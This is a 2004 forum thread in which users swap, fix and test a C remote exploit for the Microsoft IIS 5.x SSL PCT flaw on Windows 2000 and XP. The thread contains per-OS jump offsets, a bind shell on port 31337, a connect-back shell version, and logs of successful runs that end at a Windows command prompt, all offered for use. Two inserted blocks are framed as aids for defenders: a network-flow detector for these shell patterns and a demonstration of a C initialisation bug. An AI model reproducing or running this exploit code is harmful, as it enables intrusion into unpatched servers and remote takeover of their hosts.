wrong offset for "Windows XP SP1 German/English", 0x0ffb832f; to fix it, it is 0x0ffb8812
CODE
Windows XP SP1 German/English/French => 0x0ffb8812
Windows XP SP1 Norsk => 0x0ffb82cc
agathos
Apr 24 2004, 03:28 PM
thanks 101, I've fixed some other things in the src, too, and added your offset and fixed the other offset
agathos
Apr 24 2004, 03:45 PM
Linux Edition Version compiling under Linux works
CODE
/*
 ==============================================================
 Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit
 Based on THC SSL Exploit + Offset Support from cyrex
 ==============================================================

 Usage: ./ssl -h <host> -t target

 Follow targets are already Added

 Windows 2000 SP4 German/English <- thanks to 101
 Windows 2000 SP3 German/English
 Windows 2000 SP2 German/English
 Windows 2000 SP1 German/English
 Windows XP SP0 German/English
 Windows XP SP1 German/English
 Windows XP SP1 Norsk <- thanks to 101
 Windows XP Universal (Testing)
*/

int main(int argc, char *argv[])
{
    int arg;
    unsigned int i,sock,sock2,addr,rc;
    unsigned char *badbuf,*p;
    //unsigned long offset = 0x6741a1cd;
    unsigned long offset = arch[x].magic;
    unsigned long XOR = 0xffffffff;

    printf("[*] Using Offset: 0x%.8x OS: %s\n",arch[x].magic,arch[x].name);

        send(sock,badbuf,346,0);
        printf("[*] Exploit send successfully ! Sleeping a while ....\n");
        usleep(1000);
    }
    else
        printf("\nCan't connect to ssl port 443!\n");

    if(rc==0) {
        printf("[*] Trying to get a shell\n\n");
        sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        mytcp.sin_port = htons(31337);
        rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
        if(rc!=0) {
            printf("can't connect to port 31337;( maybe firewalled ...\n");
            exit(-1);
        }
        shell(sock2);
    }

    shutdown(sock,1);
    close(sock);

    free(badbuf);

    exit(0);
}

void usage()
{
    int i;
    printf("=======================================================\n");
    printf("Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n");
    printf("Based on THC SSL Exploit + Offset Support from cyrex\n");
    printf("=======================================================\n");
    printf("Targets:\n");
    for(i=0;i<=max_num;i++) {
        printf("%d - %s\n",i,arch[i].name);
    }
    exit(-1);
}

void shell(int sock)
{
    int l;
    char buf[1024];
    struct timeval time;
    unsigned long ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while (1) {
        ul[0] = 1;
        ul[1] = sock;

        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l == 1) {
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0) {
                printf ("bye bye...\n");
                return;
            }
            l = write (1, buf, l);
            if (l <= 0) {
                printf ("bye bye...\n");
                return;
            }
        } else {
            l = read (0, buf, sizeof (buf));
            if (l <= 0) {
                printf("bye bye...\n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0) {
                printf("bye bye...\n");
                return;
            }
        }
    }
}
I've finished fixing the src; it works perfectly under Linux
CODE
./ssl -h *.*.*.* -t 5
=======================================================
Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit
Based on THC SSL Exploit + Offset Support from cyrex
=======================================================

[*] building buffer
[*] connecting the target
[*] Using Offset: 0x0ffb8812 OS: Windows XP SP1 German/English
[*] Exploit send successfully ! Sleeping a while ....
[*] Trying to get a shell

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>
have fun
ScriptGod
Apr 24 2004, 04:30 PM
QUOTE (101 @ Apr 24 2004, 03:10 PM)
wrong offset for "Windows XP SP1 German/English", 0x0ffb832f; to fix it, it is 0x0ffb8812
CODE
Windows XP SP1 German/English/French => 0x0ffb8812
Windows XP SP1 Norsk => 0x0ffb82cc
0x0ffa8021: this offset should work on all English and German Windows XP, with or without a service pack, if it uses jmp esp
Paul
Apr 24 2004, 04:45 PM
Ok, I found some help with compiling by installing some programs, read this. But now it gives an error that it can't find unistd.h, anyone got this? edit: it also misses sys/time.h
101
Apr 24 2004, 04:51 PM
QUOTE (agathos @ Apr 24 2004, 03:45 PM)
I've finished fixing the src; it works perfectly under Linux
CODE
./ssl -h *.*.*.* -t 5
=======================================================
Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit
Based on THC SSL Exploit + Offset Support from cyrex
=======================================================

[*] building buffer
[*] connecting the target
[*] Using Offset: 0x0ffb8812 OS: Windows XP SP1 German/English
[*] Exploit send successfully ! Sleeping a while ....
[*] Trying to get a shell

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>
have fun
same offset works for /French too & prolly more other languages ;o
101
Apr 24 2004, 05:05 PM
looks like all original offsets of the cyrex code are changed
w2k SP4 German/English isn't 0x67419ce8 but 0x6741a1cd (cf. original code of j.cyberpunk)
ssj4conejo
Apr 24 2004, 05:19 PM
Yep, compiles sweetly under Linux.
Thanks for the mod, this exploit is great; I just wish there were more IIS 5.0 servers out there. Most of the servers out there are Linux.
agathos
Apr 24 2004, 05:22 PM
ok 101, thanks for the info, we can change it.. erm, I think we can compile it under cygwin, too, because it works under Linux without any error. Let's try
kevin007
Apr 24 2004, 05:37 PM
Oops, trying to compile now, will say how it goes
Thanks, looks interesting
MxMx
Apr 24 2004, 06:21 PM
can't compile under cygwin .. can someone help me please
agathos
Apr 24 2004, 06:31 PM
which errors did you get?
MxMx
Apr 24 2004, 06:32 PM
missing some files
brOmstar
Apr 24 2004, 06:51 PM
thx for the offsets; the new offset (only one I tested) for SP4 works well. I was so free as to add them to the revshell version together with a timeout option =)
morbido
Apr 24 2004, 07:08 PM
could anyone try to compile it on cygwin ???
I'm having some problems compiling on it
Nostremato
Apr 24 2004, 07:20 PM
can compile with cygwin without errors
Paul
Apr 24 2004, 08:24 PM
@cygwin
QUOTE
D:\Program Files\cygwin\bin>gcc d:\forum\exploit.c -o exploit.exe
d:/forum/exploit.c:22:19: stdio.h: No such file or directory
d:/forum/exploit.c:23:20: stdlib.h: No such file or directory
d:/forum/exploit.c:24:20: string.h: No such file or directory
d:/forum/exploit.c:25:19: errno.h: No such file or directory
d:/forum/exploit.c:26:20: string.h: No such file or directory
d:/forum/exploit.c:27:20: assert.h: No such file or directory
d:/forum/exploit.c:28:19: fcntl.h: No such file or directory
d:/forum/exploit.c:30:22: winsock2.h: No such file or directory
d:/forum/exploit.c: In function `main':
d:/forum/exploit.c:103: error: storage size of `mytcp' isn't known
d:/forum/exploit.c:105: error: `WSADATA' undeclared (first use in this function)
d:/forum/exploit.c:105: error: (Each undeclared identifier is reported only once
d:/forum/exploit.c:105: error: for each function it appears in.)
d:/forum/exploit.c:105: error: syntax error before "wsaData"
d:/forum/exploit.c:119: error: `EOF' undeclared (first use in this function)
d:/forum/exploit.c:122: error: `optarg' undeclared (first use in this function)
d:/forum/exploit.c:137: warning: assignment makes pointer from integer without a cast
d:/forum/exploit.c:157: error: `wsaData' undeclared (first use in this function)
d:/forum/exploit.c:163: warning: assignment makes pointer from integer without a cast
d:/forum/exploit.c:168: error: `INADDR_NONE' undeclared (first use in this function)
d:/forum/exploit.c:174: error: `AF_INET' undeclared (first use in this function)
d:/forum/exploit.c:174: error: `SOCK_STREAM' undeclared (first use in this function)
d:/forum/exploit.c:174: error: `IPPROTO_TCP' undeclared (first use in this function)
d:/forum/exploit.c:181: error: `NULL' undeclared (first use in this function)
d:/forum/exploit.c:182: error: dereferencing pointer to incomplete type
d:/forum/exploit.c:182: error: dereferencing pointer to incomplete type
d:/forum/exploit.c:187: error: dereferencing pointer to incomplete type
d:/forum/exploit.c:195: error: invalid application of `sizeof' to an incomplete type
d:/forum/exploit.c: In function `shell':
d:/forum/exploit.c:249: error: storage size of `time' isn't known
d:/forum/exploit.c:260: error: `fd_set' undeclared (first use in this function)
d:/forum/exploit.c:260: error: syntax error before ')' token
d:/forum/exploit.c:260: error: `NULL' undeclared (first use in this function)

D:\Program Files\cygwin\bin>
Probably doing something wrong
agathos
Apr 24 2004, 08:53 PM
upgrade your cygwin with devel packages
goldsun
Apr 25 2004, 03:08 AM
How do you get the return address?
Find 0xEB 0x0F in dlls, or other OPs?
agathos
Apr 25 2004, 12:38 PM
A new version is now out .. with connect back shell
CODE
/*
 =================================================================
 Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit
 SSL Exploit + Offset & Connect Back Support from cyrex
 =================================================================

 0 - Windows 2000 SP4 German/English
 1 - Windows 2000 SP3 German/English
 2 - Windows 2000 SP2 German/English
 3 - Windows 2000 SP1 German/English
 4 - Windows XP SP0 German/English
 5 - Windows XP SP1 German/English
 6 - Windows XP SP1 Norsk
 7 - Windows XP Universal (Testing)

 LOGS of successfully Exploitation

 cyrex@whitehat:~$ ./ssl -h 66.*.*.* -t 5 -c *.*.*.* -p 113
 =======================================================
 Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit
 SSL Exploit + Offset & Connect Back Support from cyrex
 =======================================================
 [+] building buffer
 [+] connecting the target
 [+] Using Offset: 0x0ffb8812 OS: Windows XP SP1 German/English
 [+] exploit send
 [+] Using ip: *.*.*.* port: 113 to Connect Back
 [*] waiting for shell
 [*] Exploit successful ! Have fun !
 [*] Gamer OVER !! Hackerz Win

 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.
*/

int main(int argc, char *argv[])
{
    int arg;
    unsigned int i,sock,sock2,sock3,addr,rc,len=16;
    unsigned char *badbuf,*p;
    unsigned long offset = arch[x].magic;
    unsigned long XOR = 0xffffffff;

    unsigned short cbport,cport;
    unsigned long cbip;

    struct sockaddr_in mytcp;
    struct hostent * hp;

    if(argc<9) {
        usage(argv[0]);
        exit(-1);
    }

    if(argc>9) {
        usage(argv[0]);
        exit(-1);
    }

    printf("=======================================================\n");
    printf("Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n");
    printf("SSL Exploit + Offset & Connect Back Support from cyrex\n");
    printf("=======================================================\n");

    while((arg=getopt(argc, argv, "h:t:c:p:")) != EOF) {
        switch(arg) {
            case 'h':
                host = optarg;
                break;
            case 't':
                x=atoi(optarg);
                if(x>max_num) {
                    printf("The target that you selected doesnt exist\n");
                    exit(-1);
                }
                break;
            case 'c':
                cip = strdup(optarg);
                break;
            case 'p':
                cport=atoi(optarg);
                break;
            default:
                usage(argv[0]);
        }
    }
void usage(char *cmd)
{
    int i;
    printf("=================================================================\n");
    printf(" Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n");
    printf(" SSL Exploit + Offset & Connect Back Support from cyrex\n");
    printf("=================================================================\n");
    printf("Usage: %s -h <targethost> -t <target> -c <yourhost> -p <yourport>\n",cmd);
    printf("e.g. : %s -h 127.0.0.1 -t 0 -c 192.168.1.3 -p 113\n",cmd);
    printf("Targets:\n");
    for(i=0;i<=max_num;i++) {
        printf("%d - %s\n",i,arch[i].name);
    }
    exit(-1);
}
void shell(int sock)
{
    int l;
    char buf[1024];
    struct timeval time;
    unsigned long ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while (1) {
        ul[0] = 1;
        ul[1] = sock;

        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l == 1) {
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0) {
                printf ("bye bye...\n");
                return;
            }
            l = write (1, buf, l);
            if (l <= 0) {
                printf ("bye bye...\n");
                return;
            }
        } else {
            l = read (0, buf, sizeof (buf));
            if (l <= 0) {
                printf("bye bye...\n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0) {
                printf("bye bye...\n");
                return;
            }
        }
    }
}
for the exe file look at the download section
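The two versions posted in this thread leave a network footprint that a defender can correlate: a connection to tcp/443 on the web server, followed within seconds either by a connection from the same client to the bind-shell port (31337 in the first version) or by the web server itself opening an outbound connection to the attacker's host and port (the -c/-p connect-back arguments, port 113 in the log above). The following flow-correlation check is added here as an illustration for defenders; it is not code from the thread or from the exploit. The log line format, the sample lines and the 30-second window are all constructed for this example.

```c
/* Flow-correlation check for the two post-exploitation patterns visible in
 * this thread (bind shell on tcp/31337, connect-back shell to the attacker's
 * port). Added as an illustration; it is not code from the thread.
 * Log format and all sample lines are constructed for this example. */
#include <stdio.h>
#include <string.h>

#define WINDOW_SECS 30      /* how long after a tcp/443 hit we stay suspicious */
#define MAX_SERVERS 16
#define MAX_ALERTS  16

/* Alert codes returned by classify_flow() */
enum { ALERT_NONE = 0, ALERT_BIND_SHELL = 1, ALERT_CONNECT_BACK = 2 };

struct server {
    char ip[16];
    long last_ssl_ts;       /* time of the last inbound tcp/443 connection */
    char last_client[16];   /* client that made it */
};

struct flow {
    long ts;
    char dir[4];            /* "in": toward the web server, "out": from it */
    char src[16]; int sport;
    char dst[16]; int dport;
};

static struct server servers[MAX_SERVERS];
static int nservers;

static struct server *lookup(const char *ip, int create)
{
    int i;
    for (i = 0; i < nservers; i++)
        if (strcmp(servers[i].ip, ip) == 0)
            return &servers[i];
    if (!create || nservers == MAX_SERVERS)
        return NULL;
    memset(&servers[nservers], 0, sizeof servers[nservers]);
    strcpy(servers[nservers].ip, ip);
    return &servers[nservers++];
}

/* Constructed line format: "<epoch> <in|out> <src>:<port> -> <dst>:<port>" */
static int parse_flow(const char *line, struct flow *f)
{
    return sscanf(line, "%ld %3s %15[^:]:%d -> %15[^:]:%d",
                  &f->ts, f->dir, f->src, &f->sport, f->dst, &f->dport) == 6;
}

int classify_flow(const struct flow *f)
{
    struct server *s;

    if (strcmp(f->dir, "in") == 0) {
        if (f->dport == 443) {              /* remember who last touched SSL */
            s = lookup(f->dst, 1);
            if (s) {
                s->last_ssl_ts = f->ts;
                strcpy(s->last_client, f->src);
            }
            return ALERT_NONE;
        }
        /* same client, shortly after the SSL hit, on a port the web server
         * should not be serving: the bind-shell pattern (31337 above) */
        s = lookup(f->dst, 0);
        if (s && f->dport != 80 && f->ts - s->last_ssl_ts <= WINDOW_SECS
              && strcmp(s->last_client, f->src) == 0)
            return ALERT_BIND_SHELL;
        return ALERT_NONE;
    }
    if (strcmp(f->dir, "out") == 0) {
        /* the web server itself opening a connection right after an SSL
         * hit: the connect-back pattern (-c host -p port above) */
        s = lookup(f->src, 0);
        if (s && f->ts - s->last_ssl_ts <= WINDOW_SECS)
            return ALERT_CONNECT_BACK;
    }
    return ALERT_NONE;
}

/* Runs all lines through the classifier; returns the number of alerts and
 * stores their codes in order in 'codes'. State is reset on every call. */
int run_detection(const char *const *lines, int n, int *codes)
{
    int i, code, nalerts = 0;
    struct flow f;

    nservers = 0;
    for (i = 0; i < n; i++) {
        if (!parse_flow(lines[i], &f))
            continue;                       /* skip malformed lines */
        code = classify_flow(&f);
        if (code != ALERT_NONE && nalerts < MAX_ALERTS)
            codes[nalerts++] = code;
    }
    return nalerts;
}

/* Constructed sample: documentation address ranges, not real hosts. */
const char *sample_log[] = {
    "1082811900 in 192.0.2.77:1034 -> 198.51.100.10:443",    /* https, fine */
    "1082811901 in 192.0.2.77:1035 -> 198.51.100.10:80",     /* http, fine */
    "1082811905 in 192.0.2.77:1036 -> 198.51.100.10:31337",  /* bind shell */
    "1082811950 in 203.0.113.5:2000 -> 198.51.100.20:443",
    "1082811951 out 198.51.100.20:1041 -> 203.0.113.5:113",  /* connect back */
    "1082812100 out 198.51.100.10:1050 -> 198.51.100.30:25", /* outside window */
};
const int sample_log_len = (int)(sizeof sample_log / sizeof sample_log[0]);

static int sample_codes[MAX_ALERTS];
int sample_alert_count(void) { return run_detection(sample_log, sample_log_len, sample_codes); }
int sample_alert_code(int i) { return sample_codes[i]; }

int main(void)
{
    int n = sample_alert_count(), i;
    for (i = 0; i < n; i++)
        printf("alert %d: %s\n", i + 1,
               sample_alert_code(i) == ALERT_BIND_SHELL ? "bind shell pattern"
                                                        : "connect-back pattern");
    return 0;
}
```

Running it reports two alerts for the constructed sample: the inbound 31337 connection right after the SSL hit, and the server-initiated connection to port 113. The outbound SMTP connection 200 seconds later is outside the window and is ignored. Web servers legitimately make outbound connections (DNS, mail, updates), so the window and the list of expected service ports are the tuning points; the outbound rule in particular should be narrowed to ports the server never uses before it is run on real flow data.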
jimmy
Apr 25 2004, 04:56 PM
could you please tell me the kind of offset? is it an EBP? EIP? jmp esp?
technoboy
Apr 25 2004, 07:05 PM
jmp esp
jimmy
Apr 26 2004, 02:22 AM
In which dll's can I use jmp esp's, if you know? Otherwise I can always attach my debugger and take a look
jimmy
Apr 26 2004, 06:50 AM
if I see it well, you define int x=0; in the beginning
then a bit further you have unsigned long offset = arch[x].magic; So at that moment x is still 0, so the offset taken will be the 0 one and not the XP one. Just a bit further you fix that and it displays the right offset, but it uses the wrong one :s
gsicht
Apr 26 2004, 04:10 PM
how is the universal xp offset? does it work?
agathos
Apr 26 2004, 05:12 PM
jimmy, I see that you don't understand C, don't talk shit
arch[x].magic means :
CODE
case 't':
    x=atoi(optarg);
    if(x>max_num) {
        printf("The target that you selected doesnt exist\n");
        exit(-1);
    }
with the parameter -t, x will be the number of the target, like 2 or 4
brOmstar
Apr 26 2004, 05:43 PM
I don't understand that either, u set x to the given parameter at the line u mean, but the offset was declared some lines before and is not changed until use
CODE
unsigned long offset = arch[x].magic; // here u set the current arch[x].magic to the offset var, x = 0 at this time
unsigned long XOR = 0xffffffff;

unsigned short cbport,cport;
unsigned long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<9) {
    usage(argv[0]);
    exit(-1);
}

if(argc>9) {
    usage(argv[0]);
    exit(-1);
}

printf("=======================================================\n");
printf("Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n");
printf("SSL Exploit + Offset & Connect Back Support from cyrex\n");
printf("=======================================================\n");

while((arg=getopt(argc, argv, "h:t:c:p:")) != EOF) {
    switch(arg) {
        case 'h':
            host = optarg;
            break;
        case 't':
            x=atoi(optarg); // here x is set to the given os argument 0-6
            if(x>max_num) {
                printf("The target that you selected doesnt exist\n");
                exit(-1);
            }
            break;
        case 'c':
            cip = strdup(optarg);
            break;
        case 'p':
            cport=atoi(optarg);
            break;
        default:
            usage(argv[0]);
    }
}

badbuf = malloc(327);
memset(badbuf,0,327);

printf("[+] building buffer\n");

p = badbuf;

memcpy(p,sslshit,sizeof(sslshit));

p+=sizeof(sslshit)-1;

strcat(p,jumper);
strcat(p,greetings_to_microsoft);

offset^=XOR;
strncat(p,(unsigned char *)&offset,4); // here u use the offset declared at the beginning
Where is the old offset changed to the selected one? Shouldn't there be something like offset = arch[x].magic after setting x to the OS argument???
agathos
Apr 26 2004, 06:21 PM
br0mstar, erm,
why did I put in this message?!
CODE
printf("[+] Using Offset: 0x%.8x OS: %s\n",arch[x].magic,arch[x].name);
brOmstar
Apr 26 2004, 06:27 PM
to display the used offset, but where do u set it? because the offset is concatenated to the buffer u send some lines before (I only want to understand, I don't criticize u or something)
CODE
int max_num = 7; //### here u set the max targets
int x=0; //### here u initialize x with the value 0

int arg;
unsigned int i,sock,sock2,sock3,addr,rc,len=16;
unsigned char *badbuf,*p;
unsigned long offset = arch[x].magic; //### u set the offset to 0x6741a1cd cause x = 0 at this time
unsigned long XOR = 0xffffffff;

unsigned short cbport,cport;
unsigned long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<9) {
    usage(argv[0]);
    exit(-1);
}

if(argc>9) {
    usage(argv[0]);
    exit(-1);
}

printf("=======================================================\n");
printf("Microsoft IIS 5.x SSL PCT Remote Windows 2k/XP Exploit\n");
printf("SSL Exploit + Offset & Connect Back Support from cyrex\n");
printf("=======================================================\n");

while((arg=getopt(argc, argv, "h:t:c:p:")) != EOF) {
    switch(arg) {
        case 'h':
            host = optarg;
            break;
        case 't':
            x=atoi(optarg); //### here u set x to the given os argument
            if(x>max_num) {
                printf("The target that you selected doesnt exist\n");
                exit(-1);
            }
            break;
        case 'c':
            cip = strdup(optarg);
            break;
        case 'p':
            cport=atoi(optarg);
            break;
        default:
            usage(argv[0]);
    }
}

//### u allocated the bufferspace for the 'bad' code;)
badbuf = malloc(327);
memset(badbuf,0,327);

printf("[+] building buffer\n");

p = badbuf;

memcpy(p,sslshit,sizeof(sslshit));

p+=sizeof(sslshit)-1;

strcat(p,jumper); //### adding the jumper asm code
strcat(p,greetings_to_microsoft); //#### adding the ms greetings asm

offset^=XOR;
strncat(p,(unsigned char *)&offset,4); //### !!! here u add the current offset to the buffer - but offset is still x6741a1cd cause u don't changed the offset value since initialising or how you did it ? i don't see it =(

if (!hp) {
    addr = inet_addr(host);
}
if ((!hp) && (addr == INADDR_NONE) ) {
    printf("[-] Unable to resolve %s\n",host);
    exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock) {
    printf("socket() error...\n");
    exit(-1);
}

if (hp != NULL)
    memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
    mytcp.sin_addr.s_addr = addr;

if (hp)
    mytcp.sin_family = hp->h_addrtype;
else
    mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(443);

printf("[+] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0) {
    send(sock,badbuf,326,0); //### here u send the prepared buffer with the old offset
    printf("[+] Using Offset: 0x%.8x OS: %s\n",arch[x].magic,arch[x].name); //### showing the right offset but did u used that ? where u set the offset to the arch[x].magic value here u only print the value ??
    printf("[+] exploit send\n");
    usleep(5000);
jimmy
Apr 26 2004, 09:26 PM
man, you say I don't know C? you're a funny guy. Better check your code and you'll see it uses the wrong offset. Try it if you don't believe me: it will print out the right offset on screen, but it will always use offset 0. I made a Windows version of it myself and fixed it, works like a charm here. BTW you'd better also fix the shell, now it keeps waiting for ages if unsuccessful. If you're such a 1337 C coder, why didn't you fix it and put in a timeout like I did
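The disagreement above comes down to one rule of C: an initialiser is evaluated once, at the point of declaration. A value copied out of a table while the index is still 0 is not updated when the index is assigned later, even though a later printf that indexes the table again shows the newly selected entry. The program below is added here to illustrate that rule in isolation; it is not the thread's code, and its table holds constructed dummy values that are not offsets of anything.

```c
/* Illustrates the initialisation-order point argued over in this thread:
 * a C initialiser runs once, at the declaration, so a copy taken from a
 * table before the index is parsed keeps entry 0 whatever is parsed later.
 * Added for illustration; not the exploit's code. The table values are
 * constructed dummies. */
#include <stdio.h>
#include <stdlib.h>

struct entry { const char *name; unsigned long magic; };

static const struct entry table[] = {
    { "entry zero", 0x11111111UL },   /* index 0 is what x starts at */
    { "entry one",  0x22222222UL },
    { "entry two",  0x33333333UL },
};
static const int max_num = 2;

/* Same shape as the thread's main(): the copy is taken while x is still 0,
 * then x is parsed from the argument. The copy is never refreshed. */
unsigned long pick_before_parse(const char *arg)
{
    int x = 0;
    unsigned long magic = table[x].magic;   /* evaluated now, with x == 0 */

    x = atoi(arg);
    if (x < 0 || x > max_num)
        x = 0;
    /* table[x].name would show the selected entry here, yet 'magic'
     * still holds table[0].magic */
    return magic;
}

/* Reading the table only after x has its final value gives the selected
 * entry; this is the ordering the thread's question asks about. */
unsigned long pick_after_parse(const char *arg)
{
    int x = atoi(arg);
    if (x < 0 || x > max_num)
        x = 0;
    return table[x].magic;
}

/* Name of the selected entry, for display; out of range falls back to 0. */
const char *pick_name(const char *arg)
{
    int x = atoi(arg);
    if (x < 0 || x > max_num)
        x = 0;
    return table[x].name;
}

int main(int argc, char *argv[])
{
    const char *arg = argc > 1 ? argv[1] : "2";
    printf("selected entry:            %s\n", pick_name(arg));
    printf("copy taken before parsing: 0x%08lx\n", pick_before_parse(arg));
    printf("read after parsing:        0x%08lx\n", pick_after_parse(arg));
    return 0;
}
```

Run with an argument of 2, the first line names "entry two" and the third line reads its value, while the second line still reports the entry 0 value, which is exactly the mismatch between the printed offset and the used offset described above. The same bug class appears in any program that snapshots configuration from a table or environment before its command line has been parsed.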
brOmstar
Apr 26 2004, 09:37 PM
adding the timeout was really simple, I did it too, but my offsets don't really work, don't know why .... never had a shell with XP, only 2k